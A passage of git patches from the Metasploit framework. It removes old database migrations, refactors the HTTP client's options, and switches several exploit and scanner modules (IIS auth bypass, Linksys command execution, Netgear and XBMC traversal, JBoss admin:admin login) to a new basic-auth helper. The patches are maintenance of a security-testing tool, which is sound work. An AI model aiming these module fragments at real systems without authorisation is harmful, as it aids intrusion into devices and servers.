self.down - add_index :hosts, :comments - add_index :services, :info - add_index :vulns, :info - end -end - diff --git a/data/sql/migrate/20110922000000_expand_notes.rb b/data/sql/migrate/20110922000000_expand_notes.rb deleted file mode 100755 index 4e77303fa0..0000000000 --- a/data/sql/migrate/20110922000000_expand_notes.rb +++ /dev/null @@ -1,9 +0,0 @@ -class ExpandNotes < ActiveRecord::Migration - def self.up - change_column :notes, :data, :text - end - def self.down - change_column :notes, :data, :string, :limit => 65536 - end -end - diff --git a/data/sql/migrate/20110928101300_add_mod_ref_table.rb b/data/sql/migrate/20110928101300_add_mod_ref_table.rb deleted file mode 100755 index 24f16d642f..0000000000 --- a/data/sql/migrate/20110928101300_add_mod_ref_table.rb +++ /dev/null @@ -1,17 +0,0 @@ -# Probably temporary, a spot to stash module names and their associated refs -# Don't count on it being populated at any given moment. -class AddModRefTable < ActiveRecord::Migration - - def self.up - create_table :mod_refs do |t| - t.string :module, :limit => 1024 - t.string :mtype, :limit => 128 - t.text :ref - end - end - - def self.down - drop_table :mod_refs - end - -end diff --git a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb b/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb deleted file mode 100755 index f0c54fed98..0000000000 --- a/data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb +++ /dev/null @@ -1,24 +0,0 @@ -class AddDisplayNameToReportsTable < ActiveRecord::Migration - - class Report < ActiveRecord::Base - end - - def self.up - - add_column :reports, :name, :string, :limit => 63 - - # Migrate to have a default name. - - Report.find(:all).each do |report| - rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" - default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] - report.name = default_name - report.save - end - end - - def self.down - remove_column :reports, :name - end - -end diff --git a/data/sql/migrate/20111203000000_inet_columns.rb b/data/sql/migrate/20111203000000_inet_columns.rb deleted file mode 100755 index 6e86654bc5..0000000000 --- a/data/sql/migrate/20111203000000_inet_columns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class InetColumns < ActiveRecord::Migration - - def self.up - change_column :hosts, :address, 'INET using address::INET' - remove_column :hosts, :address6 - end - - def self.down - change_column :hosts, :address, :text - add_column :hosts, :address6, :text - end - -end diff --git a/data/sql/migrate/20111204000000_more_inet_columns.rb b/data/sql/migrate/20111204000000_more_inet_columns.rb deleted file mode 100755 index 56adf64625..0000000000 --- a/data/sql/migrate/20111204000000_more_inet_columns.rb +++ /dev/null @@ -1,17 +0,0 @@ -class MoreInetColumns < ActiveRecord::Migration - - def self.up - change_column :wmap_requests, :address, 'INET using address::INET' - remove_column :wmap_requests, :address6 - change_column :wmap_targets, :address, 'INET using address::INET' - remove_column :wmap_targets, :address6 - end - - def self.down - change_column :wmap_requests, :address, :string, :limit => 16 - add_column :wmap_requests, :address6, :string, :limit => 255 - change_column :wmap_targets, :address, :string, :limit => 16 - add_column :wmap_targets, :address6, :string, :limit => 255 - end - -end diff --git a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb b/data/sql/migrate/20111210000000_add_scope_to_hosts.rb deleted file mode 100755 index 2bbe8f9f77..0000000000 --- a/data/sql/migrate/20111210000000_add_scope_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddScopeToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :scope, :text - end - - def self.down - remove_column :hosts, :scope - end -end diff --git a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb b/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb deleted file mode 100755 index 5e9833d884..0000000000 --- a/data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddVirtualHostToHosts < ActiveRecord::Migration - def self.up - add_column :hosts, :virtual_host, :text - end - - def self.down - remove_column :hosts, :viritual_host - end -end diff --git a/data/sql/migrate/20120411173220_rename_workspace_members.rb b/data/sql/migrate/20120411173220_rename_workspace_members.rb deleted file mode 100755 index 75003d6d36..0000000000 --- a/data/sql/migrate/20120411173220_rename_workspace_members.rb +++ /dev/null @@ -1,9 +0,0 @@ -class RenameWorkspaceMembers < ActiveRecord::Migration - def up - rename_table :project_members, :workspace_members - end - - def down - rename_table :workspace_members, :project_members - end -end diff --git a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb b/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb deleted file mode 100755 index fcd2f9e0ca..0000000000 --- a/data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb +++ /dev/null @@ -1,21 +0,0 @@ -class AddCounterCachesToHosts < ActiveRecord::Migration - - def self.up - add_column :hosts, :note_count, :integer, :default => 0 - add_column :hosts, :vuln_count, :integer, :default => 0 - add_column :hosts, :service_count, :integer, :default => 0 - - Mdm::Host.reset_column_information - Mdm::Host.all.each do |h| - Mdm::Host.reset_counters h.id, :notes - Mdm::Host.reset_counters h.id, :vulns - Mdm::Host.reset_counters h.id, :services - end - end - - def self.down - remove_column :hosts, :note_count - remove_column :hosts, :vuln_count - remove_column :hosts, :service_count - end -end \ No newline at end of file diff --git a/data/sql/migrate/20120625000000_add_vuln_details.rb b/data/sql/migrate/20120625000000_add_vuln_details.rb deleted file mode 100755 index 0f946da39c..0000000000 --- a/data/sql/migrate/20120625000000_add_vuln_details.rb +++ /dev/null @@ -1,34 +0,0 @@ -class AddVulnDetails < ActiveRecord::Migration - - def self.up - create_table :vuln_details do |t| - t.integer :vuln_id # Vuln table reference - t.float :cvss_score # 0.0 to 10.0 - t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C) - - t.string :title # Short identifier - t.text :description # Plain text or HTML (trusted) - t.text :solution # Plain text or HTML (trusted) - t.binary :proof # Should be UTF-8, but may not be, sanitize on output - # Technically this duplicates vuln.info, but that field - # is poorly managed / handled today. Eventually we will - # replace vuln.info - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - t.string :nx_vuln_id # 'jre-java-update-flaw' - t.float :nx_severity # 0-10 - t.float :nx_pci_severity # 0-10 - t.timestamp :nx_published # Normalized from "20081205T000000000" - t.timestamp :nx_added # Normalized from "20081205T000000000" - t.timestamp :nx_modified # Normalized from "20081205T000000000" - t.text :nx_tags # Comma separated - - end - end - - def self.down - drop_table :vuln_details - end -end diff --git a/data/sql/migrate/20120625000001_add_host_details.rb b/data/sql/migrate/20120625000001_add_host_details.rb deleted file mode 100755 index 36e70892fa..0000000000 --- a/data/sql/migrate/20120625000001_add_host_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddHostDetails < ActiveRecord::Migration - - def self.up - create_table :host_details do |t| - t.integer :host_id # Host table reference - - # Nexpose-specific fields - t.integer :nx_console_id # NexposeConsole table reference - t.integer :nx_device_id # Reference from the Nexpose side - end - end - - def self.down - drop_table :host_details - end -end diff --git a/data/sql/migrate/20120625000002_expand_details.rb b/data/sql/migrate/20120625000002_expand_details.rb deleted file mode 100755 index bd240ecdc5..0000000000 --- a/data/sql/migrate/20120625000002_expand_details.rb +++ /dev/null @@ -1,16 +0,0 @@ -class ExpandDetails < ActiveRecord::Migration - - def self.up - add_column :vuln_details, :nx_vuln_status, :text - add_column :vuln_details, :nx_proof_key, :text - add_column :vuln_details, :src, :string - add_column :host_details, :src, :string - end - - def self.down - remove_column :vuln_details, :nx_vuln_status - remove_column :vuln_details, :nx_proof_key - remove_column :vuln_details, :src - remove_column :host_details, :src - end -end diff --git a/data/sql/migrate/20120625000003_expand_details2.rb b/data/sql/migrate/20120625000003_expand_details2.rb deleted file mode 100755 index 4122503692..0000000000 --- a/data/sql/migrate/20120625000003_expand_details2.rb +++ /dev/null @@ -1,24 +0,0 @@ -class ExpandDetails2 < ActiveRecord::Migration - - def self.up - add_column :host_details, :nx_site_name, :string - add_column :host_details, :nx_site_importance, :string - add_column :host_details, :nx_scan_template, :string - add_column :host_details, :nx_risk_score, :float - - add_column :vuln_details, :nx_scan_id, :integer - add_column :vuln_details, :nx_vulnerable_since, :timestamp - add_column :vuln_details, :nx_pci_compliance_status, :string - end - - def self.down - remove_column :host_details, :nx_site_name - remove_column :host_details, :nx_site_importance - remove_column :host_details, :nx_scan_template - remove_column :host_details, :nx_risk_score - - remove_column :vuln_details, :nx_scan_id - remove_column :vuln_details, :nx_vulnerable_since - remove_column :vuln_details, :nx_pci_compliance_status - end -end diff --git a/data/sql/migrate/20120625000004_add_vuln_attempts.rb b/data/sql/migrate/20120625000004_add_vuln_attempts.rb deleted file mode 100755 index b943fe358f..0000000000 --- a/data/sql/migrate/20120625000004_add_vuln_attempts.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddVulnAttempts < ActiveRecord::Migration - - def self.up - create_table :vuln_attempts do |t| - t.integer :vuln_id # Vuln table reference - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - end - end - - def self.down - drop_table :vuln_attempts - end -end diff --git a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb deleted file mode 100755 index c34101fd89..0000000000 --- a/data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb +++ /dev/null @@ -1,14 +0,0 @@ -class AddVulnAndHostCounterCaches < ActiveRecord::Migration - - def self.up - add_column :hosts, :host_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_detail_count, :integer, :default => 0 - add_column :vulns, :vuln_attempt_count, :integer, :default => 0 - end - - def self.down - remove_column :hosts, :host_detail_count - remove_column :vulns, :vuln_detail_count - remove_column :vulns, :vuln_attempt_count - end -end diff --git a/data/sql/migrate/20120625000006_add_module_details.rb b/data/sql/migrate/20120625000006_add_module_details.rb deleted file mode 100755 index cb99f7ee84..0000000000 --- a/data/sql/migrate/20120625000006_add_module_details.rb +++ /dev/null @@ -1,118 +0,0 @@ -class AddModuleDetails < ActiveRecord::Migration - - def self.up - - create_table :module_details do |t| - t.timestamp :mtime # disk modified time - t.text :file # location on disk - t.string :mtype # exploit, auxiliary, post, etc - t.text :refname # module path (no type) - t.text :fullname # module path with type - t.text :name # module title - t.integer :rank # exploit rank - t.text :description # - t.string :license # MSF_LICENSE - t.boolean :privileged # true or false - t.timestamp :disclosure_date # Mar 10 2004 - t.integer :default_target # 0 - t.text :default_action # "scan" - t.string :stance # "passive" - t.boolean :ready # true/false - end - - add_index :module_details, :refname - add_index :module_details, :name - add_index :module_details, :description - add_index :module_details, :mtype - - create_table :module_authors do |t| - t.integer :module_detail_id - t.text :name - t.text :email - end - add_index :module_authors, :module_detail_id - - create_table :module_mixins do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_mixins, :module_detail_id - - create_table :module_targets do |t| - t.integer :module_detail_id - t.integer :index - t.text :name - end - add_index :module_targets, :module_detail_id - - create_table :module_actions do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_actions, :module_detail_id - - create_table :module_refs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_refs, :module_detail_id - add_index :module_refs, :name - - create_table :module_archs do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_archs, :module_detail_id - - create_table :module_platforms do |t| - t.integer :module_detail_id - t.text :name - end - add_index :module_platforms, :module_detail_id - - end - - def self.down - remove_index :module_details, :refname - remove_index :module_details, :name - remove_index :module_details, :description - remove_index :module_details, :mtype - - remove_index :module_authors, :module_detail_id - remove_index :module_mixins, :module_detail_id - remove_index :module_targets, :module_detail_id - remove_index :module_actions, :module_detail_id - remove_index :module_refs, :module_detail_id - remove_index :module_refs, :name - remove_index :module_archs, :module_detail_id - remove_index :module_platform, :module_detail_id - - drop_table :module_details - drop_table :module_authors - drop_table :module_mixins - drop_table :module_targets - drop_table :module_actions - drop_table :module_refs - drop_table :module_archs - drop_table :module_platforms - - end -end - -=begin - -Mdm::Host.find_by_sql(" -SELECT - hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref -FROM - hosts,vulns,vulns_refs,refs,module_refs,module_details -WHERE - hosts.id = vulns.host_id AND - vulns.id = vulns_refs.vuln_id AND - vulns_refs.ref_id = refs.id AND - refs.name = module_refs.name AND - module_refs.module_detail_id = modules_details.id -").map{|x| [x.address, x.mname, x.vname, x.vref ] } - - -=end diff --git a/data/sql/migrate/20120625000007_add_exploit_attempts.rb b/data/sql/migrate/20120625000007_add_exploit_attempts.rb deleted file mode 100755 index 22d3ec0b1f..0000000000 --- a/data/sql/migrate/20120625000007_add_exploit_attempts.rb +++ /dev/null @@ -1,26 +0,0 @@ -class AddExploitAttempts < ActiveRecord::Migration - - def self.up - create_table :exploit_attempts do |t| - t.integer :host_id # Host table reference (primary) - t.integer :service_id # Service table reference (optional) - t.integer :vuln_id # Vuln table reference (optional) - t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited - t.boolean :exploited # Whether or not the attempt succeeded - t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant - t.string :username # The user that tested this vulnerability - t.text :module # The specific module name that was used - t.integer :session_id # Database identifier of any opened session - t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits) - t.integer :port # Port -> Services are created/destroyed frequently and failed - t.string :proto # Protocol | attempts may be against closed ports. - end - - add_column :hosts, :exploit_attempt_count, :integer, :default => 0 - end - - def self.down - drop_table :exploit_attempts - remove_column :hosts, :exploit_attempt_count - end -end diff --git a/data/sql/migrate/20120625000008_add_fail_message.rb b/data/sql/migrate/20120625000008_add_fail_message.rb deleted file mode 100755 index 7d6dd0f96b..0000000000 --- a/data/sql/migrate/20120625000008_add_fail_message.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddFailMessage < ActiveRecord::Migration - - def self.up - add_column :vuln_attempts, :fail_detail, :text - add_column :exploit_attempts, :fail_detail, :text - end - - def self.down - remove_column :vuln_attempts, :fail_detail - remove_column :exploit_attempts, :fail_detail - end -end diff --git a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb deleted file mode 100644 index 2160e61de6..0000000000 --- a/data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb +++ /dev/null @@ -1,13 +0,0 @@ -class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration - - def self.up - add_column :web_vulns, :owner, :string - add_column :web_vulns, :payload, :text - end - - def self.down - remove_column :web_vulns, :owner - remove_column :web_vulns, :payload - end - -end diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index a5bdf41fef..42974b229a 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -69,7 +69,7 @@ class DBManager self.framework = framework self.migrated = false - self.migration_paths = [ ::File.join(Msf::Config.install_root, "data", "sql", "migrate") ] + self.migration_paths = [] self.modules_cached = false self.modules_caching = false @@ -82,6 +82,10 @@ class DBManager end initialize_database_support + + # have to set migration paths after initialize_database_support as it loads + # MetasploitDataModels. + self.migration_paths << MetasploitDataModels.root.join('db', 'migrate').to_s end # From 902948e5d395e244165e9d5c9e00a8e3faa97f76 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:01:00 -0600 Subject: [PATCH 53/87] cleanup options --- lib/rex/proto/http/client.rb | 43 ++++------------------------ lib/rex/proto/http/client_request.rb | 3 +- 2 files changed, 8 insertions(+), 38 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 38b5c3ac2b..47fa021f4f 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -129,23 +129,12 @@ class Client # # @return [ClientRequest] def request_raw(opts={}) - opts['agent'] ||= config['agent'] - opts['data'] ||= '' - opts['uri'] ||= '/' - opts['cookie'] ||= config['cookie'] - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['vhost'] ||= config['vhost'] - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - + opts = self.config.merge(opts) + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port - opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' - opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' - + req = ClientRequest.new(opts) end @@ -162,33 +151,13 @@ class Client # # @return [ClientRequest] def request_cgi(opts={}) - opts['agent'] ||= config['agent'] - opts['basic_auth'] ||= config['basic_auth'] || '' - opts['cookie'] ||= config['cookie'] + opts = self.config.merge(opts) + opts['ctype'] ||= 'application/x-www-form-urlencoded' - opts['data'] ||= '' - opts['encode'] ||= false - opts['headers'] ||= config['headers'] || {} - opts['method'] ||= 'GET' - opts['proto'] ||= 'HTTP' - opts['query'] ||= '' - opts['raw_headers'] ||= config['raw_headers'] || '' - opts['uri'] ||= '/' - opts['vars_get'] ||= {} - opts['vars_post'] ||= {} - opts['version'] ||= config['version'] || '1.1' - opts['vhost'] ||= config['vhost'] - opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port - if opts['encode_params'] == true or opts['encode_params'].nil? - opts['encode_params'] = true - else - opts['encode_params'] = false - end - req = ClientRequest.new(opts) end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 039d11559d..c941342fe7 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -27,6 +27,7 @@ class ClientRequest 'path_info' => '', 'port' => 80, 'proto' => 'HTTP', + 'query' => '', 'ssl' => false, 'uri' => '/', 'vars_get' => {}, @@ -38,7 +39,7 @@ class ClientRequest # Evasion options # 'encode_params' => true, - 'encode' => true, + 'encode' => false, 'uri_encode_mode' => 'hex-normal', # hex-all, hex-random, u-normal, u-random, u-all 'uri_encode_count' => 1, # integer 'uri_full_url' => false, # bool From 4212c36566836d99d8bf16db5dffa7dc84013d26 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Fri, 1 Mar 2013 11:59:02 -0600 Subject: [PATCH 54/87] Fix up basic auth madness --- lib/msf/core/exploit/http/client.rb | 7 +++---- lib/rex/proto/http/client.rb | 1 - lib/rex/proto/http/client_request.rb | 6 ------ .../auxiliary/admin/http/iis_auth_bypass.rb | 2 +- .../admin/http/intersil_pass_reset.rb | 4 ++-- .../admin/http/linksys_wrt54gl_exec.rb | 4 ++-- .../admin/http/netgear_sph200d_traversal.rb | 4 ++-- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- .../auxiliary/scanner/http/http_traversal.rb | 8 +++----- .../auxiliary/scanner/http/jboss_vulnscan.rb | 2 +- .../multi/http/netwin_surgeftp_exec.rb | 2 +- spec/lib/rex/proto/http/client_spec.rb | 20 ------------------- 12 files changed, 16 insertions(+), 46 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 5d8a48891e..6769a44b9a 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -163,7 +163,6 @@ module Exploit::Remote::HttpClient nclient.set_config( 'vhost' => self.vhost(), 'agent' => datastore['UserAgent'], - 'basic_auth' => self.basic_auth, 'uri_encode_mode' => datastore['HTTP::uri_encode_mode'], 'uri_full_url' => datastore['HTTP::uri_full_url'], 'pad_method_uri_count' => datastore['HTTP::pad_method_uri_count'], @@ -292,9 +291,9 @@ module Exploit::Remote::HttpClient # # Combine the user/pass into an auth string for the HTTP Client # - def basic_auth - return if not datastore['USERNAME'] - datastore['USERNAME'].to_s + ":" + (datastore['PASSWORD'].to_s || '') + def basic_auth(username, password) + auth_str = Rex::Text.encode_base64("#{username}:#{password}") + "Basic #{auth_str}" end ## diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 47fa021f4f..4a8d8108f3 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -113,7 +113,6 @@ class Client # # @param opts [Hash] # @option opts 'agent' [String] User-Agent header value - # @option opts 'basic_auth' [String] Basic-Auth header value # @option opts 'connection' [String] Connection header value # @option opts 'cookie' [String] Cookie header value # @option opts 'data' [String] HTTP data (only useful with some methods, see rfc2616) diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index c941342fe7..e0cdb4946f 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -87,12 +87,6 @@ class ClientRequest def initialize(opts={}) @opts = DefaultConfig.merge(opts) - - # Backwards compatibility for wonky basic authentication api from - # the dawn of time. - if opts['basic_auth'] and not opts['authorization'] - @opts['authorization'] = "Basic #{Rex::Text.encode_base64(opts['basic_auth'])}" - end end def to_s diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index d900abe8e7..0e051223a7 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => dir, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) vprint_status(res.body) if res diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 12934c9a0e..fb32e1f41c 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri'=> uri, 'method'=>'GET', - 'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(Rex::Text.rand_text_alpha(127),datastore['PASSWORD']) }) if res.nil? @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', - 'basic_auth' => "admin:#{datastore['PASSWORD']}" + 'authorization' => basic_auth('admin', datastore['PASSWORD']) }) if not res diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 189f937ea1..2adf4bb5e8 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) unless (res.kind_of? Rex::Proto::Http::Response) @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', - 'basic_auth' => "#{user}:#{pass}", + 'authorization' => basic_auth(user,pass), #'data' => data_cmd, 'vars_post' => { diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 632a991c0f..909afe5443 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(traversal, file), - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" + 'authorization' => basic_auth(user,pass) }) return :abort if res.nil? diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 3f03554c15..a1bcb87489 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -58,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw({ 'method' => 'GET', 'uri' => "/#{traversal}/#{datastore['FILEPATH']}", - 'basic_auth' => "#{datastore['USERNAME']}:#{datastore['PASSWORD']}" + 'authorization' => basic_auth(datastore['USERNAME'],datastore['PASSWORD']) }, 25) rescue Rex::ConnectionRefused print_error("#{rhost}:#{rport} Could not connect.") diff --git a/modules/auxiliary/scanner/http/http_traversal.rb b/modules/auxiliary/scanner/http/http_traversal.rb index a5f6c194f8..eedc2a72ce 100644 --- a/modules/auxiliary/scanner/http/http_traversal.rb +++ b/modules/auxiliary/scanner/http/http_traversal.rb @@ -28,8 +28,7 @@ class Metasploit3 < Msf::Auxiliary source against PHP applications. The 'WRITABLE' action can be used to determine if the trigger can be used to write files outside the www directory. - To use the 'COOKIE' option, set your value like so: "name=value". To use - the 'BASICAUTH' option, set it like this: "username:password". + To use the 'COOKIE' option, set your value like so: "name=value". }, 'Author' => [ @@ -70,8 +69,7 @@ class Metasploit3 < Msf::Auxiliary # We favor automatic OptString.new('TRIGGER', [false,'Trigger string. Ex: ../', '']), OptString.new('FILE', [false, 'Default file to read for the fuzzing stage', '']), - OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']), - OptString.new('BASICAUTH', [false, 'Credential to use for basic auth (Ex: admin:admin)', '']) + OptString.new('COOKIE', [false, 'Cookie value to use when sending the requests', '']) ], self.class) deregister_options('RHOST') @@ -155,7 +153,7 @@ class Metasploit3 < Msf::Auxiliary req['uri'] = this_path req['headers'] = {'Cookie'=>datastore['COOKIE']} if not datastore['COOKIE'].empty? req['data'] = datastore['DATA'] if not datastore['DATA'].empty? - req['basic_auth'] = datastore['BASICAUTH'] if not datastore['BASICAUTH'].empty? + req['authorization'] = basic_auth(datastore['USERNAME'], datastore['PASSWORD']) return req end diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index d6dc7c3638..41f5566772 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary 'uri' => app, 'method' => 'GET', 'ctype' => 'text/plain', - 'basic_auth' => 'admin:admin' + 'authorization' => basic_auth('admin','admin') }, 20) if (res and res.code == 200) print_good("#{rhost}:#{rport} Authenticated using admin:admin") diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index b546de063f..cbddcb1930 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'uri' => '/cgi/surgeftpmgr.cgi', 'method' => 'POST', - 'basic_auth' => datastore['USERNAME'] + ":" + datastore['PASSWORD'], + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'vars_post' => { 'global_smtp' => "", diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index bb2f642e38..3ddd07d6bd 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -85,26 +85,6 @@ describe Rex::Proto::Http::Client do match.captures[0].chomp.should == base64 end end - - context "and basic_auth" do - before do - cli.set_config({"basic_auth" => "user:pass"}) - end - it "should not have two Authorization headers" do - req = cli.request_cgi - match = req.to_s.match("Authorization: Basic") - match.should be - match.length.should == 1 - end - it "should prefer basic_auth" do - req = cli.request_cgi - match = req.to_s.match(/Authorization: Basic (.*)$/) - match.should be - match.captures.length.should == 1 - match.captures[0].chomp.should == base64 - end - end - end it "should attempt to connect to a server" do From bd8f94c43dac3eb9a81edcce85e47bbe183093f1 Mon Sep 17 00:00:00 2001 From: Luke Imhoff Date: Fri, 1 Mar 2013 13:44:52 -0600 Subject: [PATCH 55/87] Update to master tag of 0.5.1 of metasploit_data_models [#44034071] --- Gemfile.lock | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 6ac57f60f6..983117cbb4 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,6 +1,6 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + revision: 1e3e0c2effb8e1bb6cec9683b830e4244babf706 tag: 0.5.1 specs: metasploit_data_models (0.5.1) @@ -12,22 +12,22 @@ GIT GEM remote: http://rubygems.org/ specs: - activemodel (3.2.11) - activesupport (= 3.2.11) + activemodel (3.2.12) + activesupport (= 3.2.12) builder (~> 3.0.0) - activerecord (3.2.11) - activemodel (= 3.2.11) - activesupport (= 3.2.11) + activerecord (3.2.12) + activemodel (= 3.2.12) + activesupport (= 3.2.12) arel (~> 3.0.2) tzinfo (~> 0.3.29) - activesupport (3.2.11) + activesupport (3.2.12) i18n (~> 0.6) multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) coderay (1.0.9) diff-lcs (1.1.3) - i18n (0.6.1) + i18n (0.6.4) json (1.7.7) method_source (0.8.1) msgpack (0.5.2) From b855bd3f3affb2074b44326d94ab6c4e5edc6374 Mon Sep 17 00:00:00 2001 